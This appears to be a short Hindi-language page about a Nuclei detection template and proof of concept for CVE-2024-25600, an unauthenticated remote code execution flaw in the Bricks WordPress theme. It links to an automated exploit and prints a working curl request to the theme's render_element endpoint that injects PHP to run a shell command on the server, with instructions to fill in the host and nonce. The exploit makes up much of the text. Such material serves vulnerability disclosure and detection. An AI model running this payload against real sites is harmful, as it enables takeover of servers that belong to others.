
CVE-2024-25600 के लिए Nuclei टेम्पलेट और POC के बारे में जानकारी
CVE-2024-25600 के लिए Nuclei टेम्पलेट और POC के बारे में जानकारी
वर्डप्रेस के लिए Bricks थीम संस्करण 1.9.6 तक (इसे शामिल करते हुए) सभी संस्करणों में रिमोट कोड निष्पादन की कमजोरी है। यह अप्रमाणित हमलावरों को सर्वर पर कोड निष्पादित करने में सक्षम बनाता है। यह टेम्पलेट 🛠️ nuclei का उपयोग करके वर्डप्रेस के लिए Bricks Builder प्लगइन में पाई गई CVE-2024-25600 कमजोरी 🕳️ का पता लगाने के लिए डिज़ाइन किया गया है। यह कमजोरी प्रभावित वेबसाइटों 💻 पर अप्रमाणित रिमोट कोड निष्पादन की अनुमति देती है।
पूर्ण POC (स्वचालित) https://github.com/chocapikk/CVE-2024-25600 पर उपलब्ध है।
प्रकटीकरण द्वारा प्रदान किया गया आधार PoC इस प्रकार है:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
"objectType": "post"
}
}
}
}'
को लक्ष्य वेबसाइट से और को साइट से प्राप्त nonce मान से बदलें।
[HOST][NONCE]CVE-2024-25600 कमजोरी के बारे में अधिक जानकारी के लिए, कृपया Snicco.io पर विस्तृत प्रकटीकरण देखें।